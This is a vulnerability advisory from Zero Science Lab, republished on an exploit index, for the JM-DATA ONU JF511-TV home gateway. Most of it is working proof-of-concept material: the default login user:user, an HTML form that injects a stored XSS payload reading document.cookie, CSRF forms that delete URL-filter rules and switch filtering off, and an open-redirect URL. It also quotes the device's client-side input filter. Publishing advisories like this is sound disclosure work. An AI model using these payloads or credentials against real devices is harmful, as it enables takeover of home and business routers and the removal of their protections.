Exploit for JM-DATA ONU JF511-TV Multiple Remote Vulnerabilities

Name: Exploit for JM-DATA ONU JF511-TV Multiple Remote Vulnerabilities
Rating: 5 (207 reviews)
2022-06-14 | CVSS 6.5
## https://sploitus.com/exploit?id=ZSL-2022-5708
<html><body><p>JM-DATA ONU JF511-TV Multiple Remote Vulnerabilities


Vendor: JM-DATA GmbH
Product web page: https://www.jm-data.at
Affected version: 1.0.67
                  1.0.62
                  1.0.55

Summary: This ONU is the perfect GEPON home and business gateway.
It is an all-rounder in perfection. It can BRIDGE/NAT/RIP ROUTEND
and COMBINED.

Desc: The device suffers from multiple vulnerabilities including:
Default Credentials, CSRF, Authenticated Stored XSS and Open Redirect.

Tested on: Boa/0.93.15


Vulnerability discovered by Neurogenesia
                            @zeroscience


Advisory ID: ZSL-2022-5708
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5708.php


24.04.2022

--


Default credentials:
--------------------
user:user


Stored XSS / HTML Injection:
----------------------------

  </p>
<form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">
<input hidden="" name="url" type="hidden" value="'&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;' /&gt;
      &lt;input type="/>
<input name="submit-url" type="hidden" value="/secu_urlfilter_cfg_en.asp"/>
<input type="submit" value="Go"/>
</form>
  



CSRF (delete IP entry filter):
------------------------------

  
    <form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">
<input name="bcdata" type="hidden" value="ld3:idxi0eee"/>
<input name="action" type="hidden" value="rm"/>
<input name="submit-url" type="hidden" value="/secu_urlfilter_cfg_en.asp"/>
<input type="submit" value="Go"/>
</form>
<form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">
<input name="urlfilterEnble" type="hidden" value="off"/>
<input name="action" type="hidden" value="rm"/>
<input name="bcdata" type="hidden" value="ld3:idxi0eed3:idxi1eee"/>
<input name="submit-url" type="hidden" value="https://192.168.1.2:8443/secu_urlfilter_cfg_en.asp"/>
<input type="submit" value="Go"/>
</form>
  



Open Redirect:
--------------
https://192.168.1.2:8443/boaform/formWirelessTbl?submit-url=https://zeroscience.mk


common.js:
----------
/*
 * isCharUnsafe - test a character whether is unsafe
 * @c: character to test
 */
function isCharUnsafe(c)
{
  var unsafeString = "\"\\`\+\,='\t";

  return unsafeString.indexOf(c) != -1
    || c.charCodeAt(0) &lt;= 32
    || c.charCodeAt(0) &gt;= 123;
}

/*
 * isIncludeInvalidChar - test a string whether includes invalid characters
 * @s: string to test
 */
function isIncludeInvalidChar(s)
{
  var i;

  for (i = 0; i &lt; s.length; i++) {
    if (isCharUnsafe(s.charAt(i)) == true)
      return true;
  }

  return false;
}
</body></html>